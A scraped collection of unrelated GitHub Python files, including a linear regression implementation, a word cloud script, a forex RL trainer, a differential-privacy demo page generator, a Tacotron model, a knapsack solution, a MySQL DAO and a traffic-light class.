FCache().on_quit()\n","repo_name":"foobnix/foobnix","sub_path":"foobnix/gui/infopanel.py","file_name":"infopanel.py","file_ext":"py","file_size_in_byte":14676,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"72"} +{"seq_id":"10096666645","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom fawad_torch.nn import Linear\nfrom losses.mse_loss import MSELoss\nimport fawad_torch.optimizers as optim\n\nclass LinearRegression:\n def __init__(self):\n self.linear_layer = None\n self.loss = MSELoss()\n self.optimizer = None\n self.losses = []\n self.val_losses = []\n self.mean_x, self.mean_y = None, None\n\n def step(self, gen, train=True):\n try:\n x_batch, y_batch = next(gen)\n y_preds_batch = self.linear_layer.forward(x_batch)\n loss = self.loss.forward(y_preds_batch, y_batch)\n grad = None\n if train:\n loss_grad = self.loss.backward()\n grad = self.linear_layer.backward(loss_grad)\n return loss, grad\n except:\n raise Exception()\n \n def normalize_data(self, x, y, validation=False):\n if validation:\n if self.mean_x is None or self.mean_y is None:\n raise Exception(\"Training data must be normalized first to store mean and standard deviation\")\n elif not validation:\n self.mean_x, self.std_x = x.mean(axis=0), x.std(axis=0)\n self.mean_y, self.std_y = y.mean(axis=0), y.std(axis=0)\n x_norm = (x - self.mean_x) / (self.std_x + np.finfo(float).eps)\n y_norm = (y - self.mean_y) / (self.std_y + np.finfo(float).eps)\n return (x_norm, y_norm)\n \n \n def batch_generator(self, x, y, batch_size):\n if batch_size is None:\n yield x, y\n return\n index = 0\n while index + batch_size <= x.shape[0]:\n batch = (x[index: index+batch_size], y[index: index+batch_size])\n index += batch_size\n yield batch\n batch = (x[index: index + x.shape[0] % batch_size], y[index: index + y.shape[0] % batch_size])\n yield batch\n\n def fit(self, x_train, y_train, x_val=None, y_val=None, learning_rate=1e-9, epochs=300, batch_size=32, normal_eq=False, bias=True):\n self.bias = bias\n val = False\n if (x_val is None and y_val is not None) or (x_val is not None and y_val is None):\n raise Exception(\"x_val and y_val need to be provided together\")\n elif not (x_val is None or y_val is None):\n val = True\n self.val = val\n x_train, y_train = self.normalize_data(x_train, y_train)\n if val:\n x_val, y_val = self.normalize_data(x_val, y_val, validation=True)\n if normal_eq:\n if bias:\n x_train = np.hstack([np.ones((x_train.shape[0], 1)), x_train])\n self.linear_layer = Linear(in_features=x_train.shape[1], out_features=y_train.shape[1], bias=bias)\n self.linear_layer.w = np.dot(np.linalg.pinv(np.dot(x_train.T, x_train)), np.dot(x_train.T, y_train))\n else:\n self.linear_layer = Linear(in_features=x_train.shape[1], out_features=y_train.shape[1], bias=bias)\n self.optimizer = optim.SGD(learning_rate)\n self.losses = []\n if val:\n self.val_losses = []\n for e in range(epochs):\n train_gen = self.batch_generator(x_train, y_train, batch_size)\n losses = []\n while True:\n try:\n loss, grad = self.step(train_gen)\n loss = loss[0]\n if not np.isnan(loss):\n self.linear_layer.w = self.optimizer.step(self.linear_layer.w, grad)\n losses.append(loss)\n if val:\n val_gen = self.batch_generator(x_val, y_val, batch_size)\n val_losses = []\n while True:\n try:\n val_loss, _ = self.step(val_gen)\n val_loss = val_loss[0]\n if not np.isnan(val_loss):\n val_losses.append(val_loss)\n except:\n break\n avg_val_loss = np.array(val_losses).mean()\n self.val_losses.append(avg_val_loss)\n except:\n break\n avg_loss = np.array(losses).mean()\n self.losses.append(avg_loss)\n print(f\"Epoch: {e+1}/{epochs}\\nTraining Loss: {self.losses[-1]}\")\n if val:\n print(f\"Validation Loss: {self.val_losses[-1]}\\n\")\n print(f\"Final Loss: {self.losses[-1]}\")\n if val:\n print(f\"Final Validation Loss: {self.val_losses[-1]}\")\n\n def plot(self):\n if len(self.losses) <= 0:\n print(\"Unable to plot losses as there are no losses recorded\")\n else:\n plt.figure() # Create a new figure\n plt.plot(range(len(self.losses)), self.losses)\n plt.title(\"Training Loss\")\n plt.savefig(\"examples/linear_regression/training_loss.png\")\n if self.val:\n if len(self.val_losses) <= 0:\n print(\"Unable to plot losses as there are no losses recorded\")\n else:\n plt.figure()\n plt.plot(range(len(self.val_losses)), self.val_losses)\n plt.title(\"Validation Loss\")\n plt.savefig(\"examples/linear_regression/validation_loss.png\")\n plt.show()\n\n def predict(self, x):\n if self.linear_layer.w is None:\n print(\"Model not fit yet.\")\n return\n return self.linear_layer.forward(x)","repo_name":"FawadAhmed322/ML-Playground","sub_path":"models/linear_model.py","file_name":"linear_model.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26373676508","text":"#!/usr/bin/env python3\n\nimport wordcloud\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nimport os\nimport sys\n\nos.chdir(sys.path[0])\n\n#Let your text file be the first argument in the command line.\n#A PowerShell example:\n#python wordcloud_example.py RomeoandJuliet.txt heart.jpeg\n#My first argument is my desired text and the second argument is my mask\n\ntext = open(sys.argv[1], 'r', encoding='utf-8').read()\n\ndef calculate_frequencies(text):\n\n#I needed my own list of uninteresting words to remove from my WordCloud and customize it for different texts that I used. \n#You are more than welcome to remove or append the words that you don't want the WC to show.\n\n uninteresting_words = [\"romeo\",\"laur\",\"pet\",\"mus\",\"nurse\",\"mer\",\"wife\",\"jul\",\"serv\",\"par\",\"rom\",\"mon\",\"cap\",\"officer\",\"tyb\",\"ben\",\"abr\",\"greg\",\"samp\",\"chor\",\"the\", \"however\", \"hundred\", \"kept\", \"saying\", \"may\", \"come\", \"either\", \"rather\",\n \"up\", \"every\", \"though\", \"thus\", \"since\", \"before\", \"most\", \"than\", \"about\", \"put\", \"these\", \"then\", \"say\",\n \"because\", \"therefore\", \"off\", \"could\", \"into\", \"having\", \"on\", \"take\", \"after\", \"said\", \"on\", \"himself\", \"men\",\n \"should\", \"upon\", \"other\", \"out\", \"only\", \"now\", \"many\", \"so\", \"yet\", \"not\", \"one\", \"for\", \"would\", \"made\", \"those\",\n \"there\", \"a\", \"in\", \"to\", \"if\", \"is\", \"it\", \"of\", \"and\", \"or\", \"an\", \"as\", \"i\", \"me\", \"my\", \"none\", \"once\", \"large\", \"set\", \"indeed\", \"shall\", \"number\",\n \"we\", \"our\", \"ours\", \"you\", \"your\", \"yours\", \"he\", \"she\", \"him\", \"his\", \"her\", \"hers\", \"its\", \"they\", \"them\",\n \"their\", \"what\", \"which\", \"who\", \"whom\", \"this\", \"that\", \"am\", \"are\", \"was\", \"were\", \"be\", \"been\", \"being\",\n \"have\", \"has\", \"had\", \"do\", \"does\", \"did\", \"but\", \"at\", \"by\", \"with\", \"from\", \"here\", \"when\", \"where\", \"how\",\n \"all\", \"any\", \"both\", \"each\", \"few\", \"more\", \"some\", \"such\", \"no\", \"nor\", \"too\", \"very\", \"can\", \"will\", \"just\"]\n sentence = \"\"\n interesting_words = []\n dict_count = {}\n#Remove the punctuation from the text and generate a list of words:\n for x in text:\n if x.isalpha() or x == \" \":\n sentence += x.lower()\n\n#Remove the uninteresting words from the list of words so we are left with only\n#interesting words.\n\n for word in sentence.split():\n if word not in uninteresting_words:\n interesting_words.append(word)\n\n#We add the interesting words to the dictionary\n\n for word in interesting_words:\n if word not in dict_count:\n dict_count[word] = 0\n dict_count[word] += 1\n\n#The mask will be the second argument in the command line \n\n custom_mask = np.array(Image.open(sys.argv[2]))\n\n#Generate a wordcloud from our dictionary. You may determine the background color and if you chose not to have a mask you can remove it below. There are other parameters you can adjust and I recommend you check the documentation.\n\n cloud = wordcloud.WordCloud(background_color = 'white', mask = custom_mask)\n cloud.generate_from_frequencies(dict_count)\n\n#The interpolation will adjust the smoothness of our image. You may choose your own and see what it might \n#look like in the documentation(https://matplotlib.org/stable/gallery/images_contours_and_fields/interpolation_methods.html)\n#Let's remove the x and y axis that would otherwise appear on our image.\n#We can see the WC image with plt.show().\n\n plt.imshow(cloud, interpolation = 'bilinear')\n plt.axis('off')\n plt.show()\n\ncalculate_frequencies(text)\n","repo_name":"MarkoM-dot/WordCloud","sub_path":"wordcloud_example.py","file_name":"wordcloud_example.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17979499225","text":"from lib.Market import Market\nOg=dict\nOQ=len\nOY=False\nOU=True\nOV=open\nfrom lib.Record import Record\nfrom lib.OrderManager import OrderManager\nfrom lib.Trader import SureFireTrader\nfrom lib.Series2GAF import gaf_encode\nfrom tensorforce.agents.constant_agent import ConstantAgent\nfrom tqdm import tqdm,trange\nimport matplotlib.pyplot as plt\nimport numpy as np\nOw=np.abs\nOn=np.stack\nimport logging\nOx=logging.warning\nOt=logging.info\nimport json\nimport os\nOp=os.makedirs\nOl=os.path\nimport pickle\nON=pickle.dump\nplt.style.use('ggplot')\nOm='EURUSD'\ndef OF():\n OI=Market(data_path=\"data/%s_Candlestick_4_Hour_BID_01.08.2018-30.11.2018.csv\"%Om)\n Oa=Record()\n Oo=OrderManager(market=OI,record=Oa)\n OS=SureFireTrader(orderManager=Oo)\n OP=[20,25,30]\n OH=['BUY','SELL']\n Oy=[2,3,4]\n Oc=12\n OR=ConstantAgent(states=Og(type='float',shape=(Oc,Oc,4)),actions=Og(SLTP_pips=Og(type='int',num_actions=OQ(OP)),start_order_type=Og(type='int',num_actions=OQ(OH)),max_level_limit=Og(type='int',num_actions=OQ(Oy))),action_values={'SLTP_pips':0,'max_level_limit':0,'start_order_type':0})\n if not Ol.exists(\"save_model/constant/trades\"):\n Op(\"save_model/constant/trades\")\n if not Ol.exists('save_model/constant/0000'):\n Op('save_model/constant/0000')\n OR.save_model('save_model/constant/0000/model')\n OM=[]\n OW=[]\n OL=[]\n Os=0\n OX=0\n OB=OY\n OK=12\n Oa.reset()\n Oo.reset()\n OI.reset(start_index=Oc)\n OD=tqdm()\n while(OI.next()):\n OD.update(1)\n Oo.orders_check()\n OJ,Oz=OS.status_check()\n Oj=OI.get_ohlc(size=Oc)\n Ok=OI.get_indicators(size=Oc)\n O,H,L,C=gaf_encode(Oj['Open']),gaf_encode(Oj['High']), gaf_encode(Oj['Low']),gaf_encode(Oj['Close'])\n Or=On((O,H,L,C),axis=-1)\n if OJ=='TRADE_OVER':\n if OI.get_current_index()>Oc:\n Of=(Oa.get_net_profit()-OW[-1])/OI.get_pip()\n Ov=1.0-0.1*OQ(Oz)\n if Of>0:\n Ou=Of*Ov\n else:\n if OQ(Oz)==0:\n Ou=0\n else:\n Ou=-Ow(Oz[0]['TP']-Oz[0]['price'])/OI.get_pip()\n if OI.get_current_index()>=OI.get_data_length()-OK*Oy[-1]:\n OB=OU\n OR.observe(reward=Ou,terminal=OB)\n OL.append(Ou)\n if OB==OU:\n OD.close()\n OM.append(OL)\n break\n OT=OR.act(Or)\n OE=OP[OT['SLTP_pips']]*2\n OG=OP[OT['SLTP_pips']]\n OS.set_max_level(Oy[OT['max_level_limit']])\n Oq=OH[OT['start_order_type']]\n OS.new_trade(SL_pip=OE,TP_pip=OG,start_order_type=Oq)\n OX+=1\n Os=0\n Ot(\"NewTradeStarted: current net profit=%f (price@%f)\"%(Oa.get_net_profit(),OI.get_market_price()))\n elif OJ=='ADD_ORDER':\n OA=OS.get_orders_detail()[-1]\n if OA['order_type']=='BUY':\n Oi=OA['price']-OI.get_pip(OG)\n elif OA['order_type']=='SELL':\n Oi=OA['price']+OI.get_pip(OG)\n OS.add_reverse_order(price=Oi,SL_pip=OE,TP_pip=OG)\n Os=0\n elif OJ=='ERROR':\n Ox(\"SureFireError: order issues...\")\n elif OJ=='NONE':\n Os+=1\n if Os>=OK:\n Of=(Oa.get_net_profit()-OW[-1])/OI.get_pip()\n Ov=1.0-0.1*OQ(Oz)\n if Of>0:\n Ou=Of*Ov\n else:\n if OQ(Oz)==0:\n Ou=0\n else:\n Ou=-Ow(Oz[0]['TP']-Oz[0]['price'])/OI.get_pip()\n if OI.get_current_index()>=OI.get_data_length()-OK*Oy[-1]:\n OB=OU\n OR.observe(reward=Ou,terminal=OB)\n OL.append(Ou)\n if OB==OU:\n OD.close()\n OM.append(OL)\n break\n OT=OR.act(Or)\n OE=OP[OT['SLTP_pips']]*2\n OG=OP[OT['SLTP_pips']]\n OS.set_max_level(Oy[OT['max_level_limit']])\n Oq=OH[OT['start_order_type']]\n OS.new_trade(SL_pip=OE,TP_pip=OG,start_order_type=Oq)\n Os=0\n Ot(\"NewTradeStarted: current net profit=%f (price@%f)\"%(Oa.get_net_profit(),OI.get_market_price()))\n OW.append(Oa.get_net_profit())\n with OV('save_model/constant/trades/episode_0000.pkl','wb')as f:\n ON(Oa.get_history(),f,protocol=-1)\n with OV('save_model/constant/trades/profit_history.pkl','wb')as f:\n ON(OW,f,protocol=-1)\n with OV('save_model/constant/trades/reward_history.pkl','wb')as f:\n ON(OM,f,protocol=-1)\n Oa.show_details()\nif __name__==\"__main__\":\n OF()","repo_name":"RainBoltz/rlfxer","sub_path":"source code/trainer_baseline.py","file_name":"trainer_baseline.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"5109468607","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport os.path\n\nimport ctools\nimport ctools.tydoc as tydoc\nfrom tydoc import TyTag\n\nLOCALHOST_CDN = False\nLOCAL_CDN = False\nREQUIRED = ['https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/themes/smoothness/jquery-ui.css',\n 'https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js',\n 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js',\n 'demo.css',\n 'optimizer.js',\n 'demo.js']\n\nSCENARIOS = [ ('1,2,3,4,5,6,101,102,103,104,105,106','Balanced rural and urban blocks'),\n ('1,2,3,400,5,6,101,102,103,104,105,106','One rural block with a LOT of males.'),\n ('1,2,3,4,5,6,101,102,103,104,600,106','One urban block with a LOT of females.'),\n ('1,2,3,4,5,6,101,102,103,104,1,106','One urban block with just one female'),\n ]\n\nclass MatrixMaker:\n def __init__(self,id_prefix,editable=True):\n self.id_prefix = id_prefix\n self.editable = editable;\n\n def pop_data_fields(self, name, level, f=None, m=None ):\n d1 = TyTag('div', attrib={'class':'dataline1'})\n d1t = TyTag('span', text=f'{name} pop: ', attrib={'class':'datalabel'})\n d1d = TyTag('span', text='tbd', attrib={'class':'data', 'id':self.id_prefix+level+\"-pop\"})\n d1.extend([d1t,d1d])\n\n d2 = TyTag('div', attrib={'class':'dataline2'})\n d2t = TyTag('span', text='f: ', attrib={'class':'datalabel'})\n \n d3 = TyTag('div', attrib={'class':'dataline3'})\n d3t = TyTag('span', text='m: ', attrib={'class':'datalabel'})\n \n if self.editable==True and 'Block' in name:\n attrib = {'type':'text', 'min':'0', 'max':'999', 'size':'3', 'class':'data'}\n d2d = TyTag('input', attrib={**attrib, **{'id':self.id_prefix+level+'-f', 'value':'0'}})\n d3d = TyTag('input', attrib={**attrib, **{'id':self.id_prefix+level+'-m', 'value':'0'}})\n else:\n attrib = {'class':'data'}\n d2d = TyTag('span', text='tbd', attrib={**attrib, **{'id':self.id_prefix+level+'-f'}})\n d3d = TyTag('span', text='tbd', attrib={**attrib, **{'id':self.id_prefix+level+'-m'}})\n\n d2.extend([d2t,d2d])\n d3.extend([d3t,d3d])\n\n return [ d1, d2, d3 ]\n\n def add_matrix(self,doc):\n t = tydoc.tytable()\n tr = t.tbody.add_tag('tr')\n tr.add_tag_elems('td', self.pop_data_fields('Tiny County', 'county'), attrib={'colspan':'6'})\n tr = t.tbody.add_tag('tr')\n tr.add_tag_elems('td', self.pop_data_fields('Ruralland ', 'rcounty'), attrib={'colspan':'3', 'class':'ruralcounty'})\n tr.add_tag_elems('td', self.pop_data_fields('Urbanville', 'ucounty'), attrib={'colspan':'3', 'class':'urbancounty'})\n tr = t.tbody.add_tag('tr')\n tr.add_tag_elems('td', self.pop_data_fields('RBlock
', 'b1'), attrib={'class':'ruralblock block'})\n tr.add_tag_elems('td', self.pop_data_fields('RBlock
', 'b2'), attrib={'class':'ruralblock block'})\n tr.add_tag_elems('td', self.pop_data_fields('RBlock
', 'b3'), attrib={'class':'ruralblock block'})\n tr.add_tag_elems('td', self.pop_data_fields('UBlock
', 'b4'), attrib={'class':'urbanblock block'})\n tr.add_tag_elems('td', self.pop_data_fields('UBlock
', 'b5'), attrib={'class':'urbanblock block'})\n tr.add_tag_elems('td', self.pop_data_fields('UBlock
', 'b6'), attrib={'class':'urbanblock block'})\n\n doc.append(t)\n return t\n\nif __name__==\"__main__\":\n doc = tydoc.tydoc()\n # https://developers.google.com/speed/libraries/#jquery\n\n for url in REQUIRED:\n # Check if we should use our phantom CDN\n if url.startswith('https:'):\n if LOCALHOST_CDN:\n url = 'http://localhost/cdn/' + os.path.basename(url)\n elif LOCAL_CDN:\n url = 'cdn/' + os.path.basename(url)\n\n if url.endswith('.css'):\n doc.head.add_tag(\"link\", attrib={'rel':'stylesheet','href':url, 'media':'all'})\n elif url.endswith('.js'):\n doc.head.add_tag(\"script\", attrib={'src':url})\n else:\n raise RuntimeError(\"Unknown file type: \"+url)\n\n\n div = doc.body.add_tag(\"div\", attrib={'class':'row'})\n col1 = div.add_tag('div', attrib={'class':'column left'})\n col2 = div.add_tag('div', attrib={'class':'column middle noise'})\n col3 = div.add_tag('div', attrib={'class':'column right'})\n \n col1.add_tag_text('p','Confidential database:')\n MatrixMaker('r', editable=True).add_matrix(col1)\n col2.text=('

'\n '

Noise Barrier
'\n '
'\n 'ε '\n '

' )\n col3.add_tag_text('p','Published official tabulations:')\n MatrixMaker('p', editable=False).add_matrix(col3)\n doc.body.add_tag_text('p','Each rectangle shows the population statistics for a different geographical area. The top is the total population (pop), followed by the number of females (f) and the number of males (m).',attrib={'class':'instructions'}),\n \n doc.body.add_tag_text('p','ε specifies the privacy loss budget. Click privatize! to re-run the privacy mechanism with a different set of random noises.',attrib={'class':'instructions'}),\n \n doc.body.add_tag_text('p','Try changng the number of females or males that was counted on a block and see how it changes the official tabulations. Or choose one of the sample scenarios listed below.',attrib={'class':'instructions'}),\n \n t = tydoc.tytable(attrib={'class':'scenarios'})\n t.add_head(['select','scenario'])\n\n for (counts,desc) in SCENARIOS:\n t.add_data([TyTag('input',attrib={'type':'button',\n 'class':'sbutton',\n 'counts':counts}),\n desc])\n doc.append(t)\n\n doc.save(\"demo.html\")\n \n","repo_name":"simsong/dp-demo","sub_path":"sim-top-down/make_demo.py","file_name":"make_demo.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27409208241","text":"\"\"\"\nThis module contains a tacotron model that can be reused.\n\"\"\"\n\nimport torch\nfrom torch.nn import (\n GRU,\n Dropout,\n InstanceNorm1d,\n LeakyReLU,\n Linear,\n MaxPool1d,\n Module,\n ModuleList,\n)\n\nfrom .layers import AttentionLayer, Conv1dNorm, HighWay\n\n\nclass CBHG(Module):\n \"CBHG network\"\n\n def __init__(self, features, proj_size, rnn_size, rnn_layers, K, ns, max_pooling):\n super().__init__()\n conv_banks = [\n Conv1dNorm(\n in_channels=features,\n out_channels=features,\n kernel_size=k,\n stride=1,\n padding=k // 2,\n activation=LeakyReLU(negative_slope=ns),\n )\n for k in range(1, 1 + K)\n ]\n self.conv_banks = ModuleList(conv_banks)\n if max_pooling:\n self.maxpool1d = MaxPool1d(kernel_size=2, stride=1, padding=1)\n conv_proj = [\n Conv1dNorm(\n in_channels=in_size,\n out_channels=out_size,\n kernel_size=3,\n stride=1,\n padding=1,\n activation=activ,\n )\n for in_size, out_size, activ in zip(\n (K * features, *proj_size[:-1]),\n proj_size,\n (LeakyReLU(negative_slope=ns) for _ in range(len(proj_size) - 1))\n + [None],\n )\n ]\n self.conv_proj = ModuleList(conv_proj)\n self.pre_highway = Linear(in_features=proj_size[-1], out_features=features)\n self.highways = ModuleList(HighWay(features, ns=ns) for _ in range(4))\n self.rnn = GRU(\n input_size=features,\n hidden_size=rnn_size,\n num_layers=rnn_layers,\n bidirectional=True,\n )\n\n def forward(self, x):\n \"Pass through\"\n # x : batch, features, timesteps\n timesteps = x.size(-1)\n outs = torch.cat([conv(x)[..., :timesteps] for conv in self.conv_banks], dim=1)\n try:\n outs = self.maxpool1d(outs)[..., :timesteps]\n except AttributeError:\n pass\n for conv in self.conv_proj:\n outs = conv(outs)\n outs = outs.permute(2, 0, 1)\n outs = self.pre_highway(outs)\n for highway in self.highways:\n outs = highway(outs)\n return self.rnn(outs)\n\n\nclass PreNet(Module):\n \"Encoder's door step\"\n\n def __init__(self, features, ns):\n super().__init__()\n in_features = features[:-1]\n out_features = features[1:]\n layers = sum(\n (\n (\n Linear(in_features=in_size, out_features=out_size),\n InstanceNorm1d(num_features=out_size),\n LeakyReLU(negative_slope=ns),\n Dropout(0.5),\n )\n for in_size, out_size in zip(in_features, out_features)\n ),\n (),\n )\n self.layers = ModuleList(layers)\n\n def forward(self, x):\n \"Pass through\"\n # Pass through all layers\n for layer in self.layers:\n x = layer(x)\n return x\n\n\nclass Encoder(Module):\n \"Encoder of tactron\"\n\n def __init__(\n self,\n n_channels,\n prenet_units,\n proj_size,\n cbhg_maxpool,\n rnn_size,\n rnn_layers,\n K,\n ns,\n ):\n super().__init__()\n self.prenet = PreNet(features=[n_channels] + list(prenet_units), ns=ns)\n self.cbhg = CBHG(\n features=prenet_units[-1],\n proj_size=proj_size,\n rnn_size=rnn_size,\n rnn_layers=rnn_layers,\n K=K,\n ns=ns,\n max_pooling=cbhg_maxpool,\n )\n\n def forward(self, signal):\n \"Pass through\"\n # signal: (batch, features, timesteps)\n signal = signal.transpose(1, 2)\n processed = self.prenet(signal)\n processed.transpose_(1, 2)\n return self.cbhg(processed)\n\n\nclass Decoder(Module):\n \"Decoder of tactron\"\n\n def __init__(\n self,\n prenet_units,\n hidden_sizes,\n cbhg_maxpool,\n rnn_layers,\n proj_size,\n cbhg_rnn,\n n_channels,\n K,\n R,\n ns,\n ):\n super().__init__()\n prev_rnn, self_rnn = hidden_sizes\n self.prenet_enc = PreNet(features=[2 * prev_rnn] + list(prenet_units), ns=ns)\n self.prenet_dec = PreNet(features=[self_rnn] + list(prenet_units), ns=ns)\n self.prenet_dec_transform = Linear(\n in_features=prenet_units[-1], out_features=2 * prev_rnn\n )\n self.prenet_enc_transform = Linear(\n in_features=prenet_units[-1], out_features=2 * prev_rnn\n )\n self.attn_enc = AttentionLayer(\n input_size=prenet_units[-1], hidden_size=2 * prev_rnn\n )\n self.attn_dec = AttentionLayer(\n input_size=prenet_units[-1], hidden_size=2 * prev_rnn\n )\n self.pre_decoder_rnn = Linear(\n in_features=4 * 2 * prev_rnn, out_features=self_rnn\n )\n self.decoder_rnn = GRU(\n input_size=self_rnn, hidden_size=self_rnn, num_layers=rnn_layers\n )\n # self.decoder_attention = AttentionLayer()\n cbhg_rnn_size, cbhg_rnn_layers = cbhg_rnn\n self.cbhg = CBHG(\n features=self_rnn,\n proj_size=proj_size,\n rnn_size=cbhg_rnn_size,\n rnn_layers=cbhg_rnn_layers,\n K=K,\n ns=ns,\n max_pooling=cbhg_maxpool,\n )\n self.out = Linear(in_features=2 * cbhg_rnn_size, out_features=n_channels)\n self.multiple_frames = Linear(in_features=self_rnn, out_features=R * self_rnn)\n self.R = R\n self.leaky_relu = LeakyReLU(negative_slope=ns)\n\n def forward(self, encoded, state_enc, start_token, starting_states, max_len):\n \"Pass through\"\n assert max_len % self.R == 0\n decoded = [start_token]\n state_dec, _state_dec = starting_states\n state_enc = state_enc.view(state_enc.size(1), -1)\n for _ in range(max_len // self.R):\n current_decoded = torch.cat(decoded, dim=0)\n reduced_encoded = self.prenet_enc(encoded)\n reduced_decoded = self.prenet_dec(current_decoded)\n transformed_encoded = self.prenet_enc_transform(reduced_encoded)\n state_enc, alignment_enc = self.attn_enc(\n reduced_encoded[-1], state_enc, transformed_encoded\n )\n transformed_decoded = self.prenet_dec_transform(reduced_decoded)\n state_dec, alignment_dec = self.attn_dec(\n reduced_decoded[-1], state_dec, transformed_decoded\n )\n concat = torch.cat(\n [state_enc, alignment_enc, state_dec, alignment_dec], dim=-1\n )\n concat = self.leaky_relu(concat)\n concat = self.pre_decoder_rnn(concat)\n concat = self.leaky_relu(concat)\n concat = concat.transpose(0, 1)\n dec_out, _state_dec = self.decoder_rnn(concat, _state_dec)\n dec_out = dec_out + concat\n sizes = dec_out.size()\n dec_out = self.leaky_relu(dec_out)\n dec_out = self.multiple_frames(dec_out)\n dec_out = dec_out.view(self.R, *sizes[1:])\n decoded.append(dec_out)\n state_enc, state_dec = state_enc.squeeze(1), state_dec.squeeze(1)\n decoded = torch.cat(decoded[1:], dim=0)\n decoded = decoded.permute(1, 2, 0)\n dec_out, _ = self.cbhg(decoded)\n dec_out = self.leaky_relu(dec_out)\n out = self.out(dec_out)\n return out\n\n\nclass Tacotron(Module):\n \"Tacotron 2 model\"\n\n def __init__(\n self,\n n_channels,\n r,\n ns,\n enc_prenet_units,\n enc_proj_size,\n enc_rnn_size,\n enc_rnn_layers,\n enc_k,\n dec_prenet_units,\n dec_proj_size,\n dec_rnn_size,\n dec_rnn_layers,\n dec_k,\n main_rnn_size,\n main_rnn_layers,\n enc_cbhg_maxpool,\n dec_cbhg_maxpool,\n ):\n super().__init__()\n self.enc = Encoder(\n n_channels=n_channels,\n prenet_units=enc_prenet_units,\n proj_size=enc_proj_size,\n cbhg_maxpool=enc_cbhg_maxpool,\n rnn_size=enc_rnn_size,\n rnn_layers=enc_rnn_layers,\n K=enc_k,\n ns=ns,\n )\n self.dec = Decoder(\n prenet_units=dec_prenet_units,\n hidden_sizes=(enc_rnn_size, main_rnn_size),\n rnn_layers=main_rnn_layers,\n proj_size=dec_proj_size,\n cbhg_maxpool=dec_cbhg_maxpool,\n cbhg_rnn=(dec_rnn_size, dec_rnn_layers),\n n_channels=n_channels,\n K=dec_k,\n R=r,\n ns=ns,\n )\n\n def forward(self, x, max_len, start_token=None, starting_states=None):\n \"Pass through\"\n if start_token is None:\n start_token = x.new_zeros(\n size=[1, len(x), self.dec.decoder_rnn.hidden_size]\n )\n if starting_states is None:\n starting_states = [\n x.new_zeros(size=[len(x), 2 * self.enc.cbhg.rnn.hidden_size]),\n x.new_zeros(\n size=[\n self.dec.decoder_rnn.num_layers,\n len(x),\n self.dec.decoder_rnn.hidden_size,\n ]\n ),\n ]\n encoded, state = self.enc(x)\n decoded = self.dec(\n encoded=encoded,\n state_enc=state,\n start_token=start_token,\n starting_states=starting_states,\n max_len=max_len,\n )\n return decoded.permute(1, 2, 0)\n","repo_name":"rentruewang/cant-hear","sub_path":"src/tacotron.py","file_name":"tacotron.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"11539515392","text":"n,k = map(int,input().split())\r\ndata = [[0,0]]\r\nfor i in range(n):\r\n data.append(list(map(int,input().split())))\r\n\r\ndp =[ [0]*(k+1) for _ in range(n+1)]\r\n\r\nfor i in range(1,n+1):\r\n for j in range(k+1):\r\n if j < data[i][0]:\r\n dp[i][j] = dp[i-1][j]\r\n else:\r\n dp[i][j] = max(dp[i-1][j], data[i][1]+dp[i-1][j-data[i][0]])\r\nprint(dp[n][k])","repo_name":"HyemIin/algorithm-code-test","sub_path":"백준/Gold/12865. 평범한 배낭/평범한 배낭.py","file_name":"평범한 배낭.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9168915236","text":"from basedao import BaseDAO\n\n\nclass SPYVIXHedgeDAO(BaseDAO):\n\n def __init__(self):\n BaseDAO.__init__(self)\n\n def save(self, records):\n query_template = \"\"\"insert into spy_vix_hedge (trade_date, vix_index, vix_delta,spy_vol,spy_price,spy_option_delta,vix_vol,vix_price,vxx_delta,ratio) values\n (str_to_date('{}', '%Y-%m-%d'), {}, {},{},{},{},{},{},{},{})\n on duplicate key update vix_index = {}, vix_delta = {}, spy_vol = {}, spy_price = {}, spy_option_delta = {},vix_vol = {},vix_price = {},vxx_delta = {},ratio = {}\"\"\"\n conn = BaseDAO.get_connection()\n cursor = conn.cursor()\n\n for record in records:\n query = BaseDAO.mysql_format(query_template, record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],record[8],record[9], \\\n record[1], record[2], record[3], record[4], record[5], record[6], record[7], record[8], record[9])\n self.execute_query(query, cursor)\n conn.commit()\n conn.close()\n\n def select_all(self):\n query = \"\"\"select * from spy_vix_hedge\"\"\"\n rows = self.select(query)\n return rows\n","repo_name":"shmyhero/data-process","sub_path":"dataaccess/spyvixhedgedao.py","file_name":"spyvixhedgedao.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13998681209","text":"## import random\nfrom time import sleep\nclass TrafficLight:\n # атрибуты класса\n #color = [random.randint (\"Красный \", \"Желтый ○\", \"Зеленый ☻\") for i in range(0:)] #(1, 2, 3) #(\"Красный \", \"Желтый ○\", \"Зеленый ☻\")\n\n ##color = random.choice([\"Красный \", \"Желтый ○\", \"Зеленый ☻\"])\n __color = [\"Красный \", \"Желтый ○\", \"Зеленый ☻\"]\n # __a_red = \"Красный \"\n # __a_yellow = \"Желтый ○\"\n # __a_green = \"Зеленый ☻\"\n # метод\n def running(self):\n i = 0\n while i != 3:\n print(TrafficLight.__color[i])\n if i == 0:\n sleep(7)\n elif i == 1:\n sleep(2)\n elif i == 2:\n sleep(1)\n i += 1\n\nt = TrafficLight()\nt.running()\n# 